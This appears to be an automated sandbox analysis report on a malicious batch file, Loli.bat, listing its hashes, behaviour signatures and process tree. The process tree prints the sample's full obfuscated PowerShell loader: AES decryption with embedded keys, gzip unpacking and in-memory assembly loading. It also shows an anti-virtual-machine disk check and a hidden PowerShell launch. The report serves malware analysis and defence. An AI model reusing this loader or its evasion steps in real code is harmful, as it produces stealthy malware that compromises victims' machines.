Analysis
-
max time kernel
118s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
18-12-2024 01:57
Static task
static1
Behavioral task
behavioral1
Sample
Loli.bat
Resource
win7-20240903-en
windows7-x64
4 signatures
150 seconds
Behavioral task
behavioral2
Sample
Loli.bat
Resource
win10v2004-20241007-en
windows10-2004-x64
19 signatures
150 seconds
General
-
Target
Loli.bat
-
Size
7.3MB
-
MD5
8a7f2cf2f4a59fc4220c677d3b8df79e
-
SHA1
6bb7854dc78dcb7a5e419e5eec371f4a776bb6a7
-
SHA256
37f8cdab00b96fa1d7f5edd1c0d7ed1c048b7cf0a94b30e4b2fe507dbd69ebff
-
SHA512
15acdd90a51634c1dbfcbee7dd2822742e42c4618e6590e238ac08abbb26c53e3c3e64e98ddb5439c7499af90eca66bb49c7dfeb5b6e01693e4e521fa5edbfc4
-
SSDEEP
49152:ATU9DCJDJw+wDkT1uYtsfLfYJZpXAQfiWBpvuLpCKUYCPFJJ+weKaTYHlFYdWKhL:n
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2056 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2056 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2056 powershell.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 2304 wrote to memory of 2392 2304 cmd.exe 31 PID 2304 wrote to memory of 2392 2304 cmd.exe 31 PID 2304 wrote to memory of 2392 2304 cmd.exe 31 PID 2304 wrote to memory of 2536 2304 cmd.exe 32 PID 2304 wrote to memory of 2536 2304 cmd.exe 32 PID 2304 wrote to memory of 2536 2304 cmd.exe 32 PID 2304 wrote to memory of 2988 2304 cmd.exe 33 PID 2304 wrote to memory of 2988 2304 cmd.exe 33 PID 2304 wrote to memory of 2988 2304 cmd.exe 33 PID 2304 wrote to memory of 2056 2304 cmd.exe 34 PID 2304 wrote to memory of 2056 2304 cmd.exe 34 PID 2304 wrote to memory of 2056 2304 cmd.exe 34
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Loli.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2304 -
C:\Windows\system32\fsutil.exefsutil fsinfo drives2⤵PID:2392
-
-
C:\Windows\system32\findstr.exefindstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"2⤵PID:2536
-
-
C:\Windows\system32\cmd.execmd.exe /c echo function mlBf($ELFV){ Invoke-Expression -Verbose -WarningAction Inquire '$cUKE=[JZSyJZsJZteJZm.JZSJZeJZcuJZrJZiJZtJZyJZ.CJZrJZypJZtJZoJZgrJZaJZpJZhJZy.JZAeJZsJZ]:JZ:CJZrJZeJZaJZtJZe(JZ)JZ;'.Replace('JZ', ''); Invoke-Expression -WarningAction Inquire -Verbose '$cUKE.MUcodUceUc=[UcSyUcsUctUcemUc.UcSUceUccUcurUciUctyUc.UcCUcryUcpUctUcoUcgrUcapUchUcy.UcCiUcpUchUceUcrUcMoUcdUce]Uc:Uc:UcCBUcCUc;'.Replace('Uc', ''); Invoke-Expression -Debug -Verbose -WarningAction Inquire -InformationAction Ignore '$cUKE.PGxadGxdGxinGxg=Gx[GxSGxysGxtGxeGxmGx.GxSeGxcGxurGxiGxtGxy.GxCGxrGxyGxptGxogGxrGxapGxhyGx.GxPGxaGxdGxdiGxnGxgMGxoGxdGxe]Gx:Gx:GxPGxKCGxSGx7;'.Replace('Gx', ''); Invoke-Expression -Debug -WarningAction Inquire -Verbose -InformationAction Ignore '$cUKE.KmNeymN=mN[SmNysmNtmNemNm.mNCmNomNnmNvmNermNtmN]:mN:mNFmNromNmmNBmNamNsemN64mNSmNtrmNinmNgmN("7mNxhmNEmNmFmNkymNdmNQmNABmNgmNJmNjmNxmN5SmN2mNzXmN4mNgmNyrmNZmN5mNbmNevmNGYmNPmN6NmN3FmNBmNEmNDmNEmNAsmN=mN");'.Replace('mN', ''); Invoke-Expression -WarningAction Inquire -Debug -InformationAction Ignore '$cUKE.IqHV=qH[qHSyqHstqHeqHmqH.CqHoqHnqHvqHeqHrtqH]qH::qHFqHrqHomqHBqHaqHsqHe6qH4SqHtqHriqHngqH("7qHkeqHvqHCJqHfOqH5qHxqHcGqHIqHhqHeqH7qHI+qH/qHv7qHAqH=qH=");'.Replace('qH', ''); $Llou=$cUKE.CreateDecryptor(); $jyzK=$Llou.TransformFinalBlock($ELFV, 0, $ELFV.Length); $Llou.Dispose(); $cUKE.Dispose(); $jyzK;}function OVPC($ELFV){ Invoke-Expression -WarningAction Inquire -InformationAction Ignore -Verbose -Debug '$AFBf=Nlrewlr-lrOblrjelrclrtlr Slrylrslrtlrelrm.lrIlrO.lrMlrelrmolrrlrylrSlrtrlrealrmlr(,$ELFV);'.Replace('lr', ''); Invoke-Expression -Debug -InformationAction Ignore -Verbose -WarningAction Inquire '$gddj=Nlrewlr-lrOblrjelrclrtlr Slrylrslrtlrelrm.lrIlrO.lrMlrelrmolrrlrylrSlrtrlrealrmlr;'.Replace('lr', ''); Invoke-Expression -WarningAction Inquire -InformationAction Ignore '$tBrH=NPFewPF-PFObPFjePFcPFtPF SPFyPFsPFtPFePFm.PFIPFO.PFCPFoPFmpPFrPFePFsPFsiPFonPF.PFGZPFipPFSPFtPFrPFePFamPF($AFBf, [PFIOPF.PFCoPFmpPFrPFePFssPFiPFoPFnPF.PFCoPFmPFprPFePFsPFsiPFoPFnPFMPFodPFe]PF:PF:DPFecPFoPFmPFpPFrPFesPFsPF);'.Replace('PF', ''); $tBrH.CopyTo($gddj); $tBrH.Dispose(); $AFBf.Dispose(); $gddj.Dispose(); $gddj.ToArray();}function rFaI($ELFV,$XuUO){ Invoke-Expression -Verbose '$cPFF=[PJSyPJsPJtePJm.PJRPJePJflPJePJcPJtPJiPJonPJ.PJAsPJsPJePJmbPJlPJyPJ]PJ::PJLoPJaPJd([byte[]]$ELFV);'.Replace('PJ', ''); Invoke-Expression -InformationAction Ignore '$GtPT=$cPFF.EjyntjyrjyyPjyoijynjyt;'.Replace('jy', ''); Invoke-Expression -WarningAction Inquire -InformationAction Ignore -Verbose -Debug '$GtPT.WqInWqvWqokWqe(Wq$WqnWqulWqlWq, $XuUO);'.Replace('Wq', '');}$TzAi = 'C:\Users\Admin\AppData\Local\Temp\Loli.bat';$host.UI.RawUI.WindowTitle = $TzAi;$drwF=[System.IO.File]::ReadAllText($TzAi).Split([Environment]::NewLine);foreach ($EhXl in $drwF) { if ($EhXl.StartsWith('bhKKm')) { $cwwY=$EhXl.Substring(5); break; }}$tyyO=[string[]]$cwwY.Split('\');Invoke-Expression -InformationAction Ignore -Debug '$jQc = OVPC (mlBf ([zSCozSnzSvezSrtzS]zS:zS:FzSrzSozSmzSBzSaszSezS64zSSzStzSrizSnzSgzS($tyyO[0].Replace("#", "/").Replace("@", "A"))));'.Replace('zS', '');Invoke-Expression -InformationAction Ignore -WarningAction Inquire -Debug '$oYu = OVPC (mlBf ([zSCozSnzSvezSrtzS]zS:zS:FzSrzSozSmzSBzSaszSezS64zSSzStzSrizSnzSgzS($tyyO[1].Replace("#", "/").Replace("@", "A"))));'.Replace('zS', '');Invoke-Expression -InformationAction Ignore -Verbose -WarningAction Inquire '$bao = OVPC (mlBf ([zSCozSnzSvezSrtzS]zS:zS:FzSrzSozSmzSBzSaszSezS64zSSzStzSrizSnzSgzS($tyyO[2].Replace("#", "/").Replace("@", "A"))));'.Replace('zS', '');rFaI $jQc $null;rFaI $oYu $null;rFaI $bao (,[string[]] (''));2⤵PID:2988
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2056
-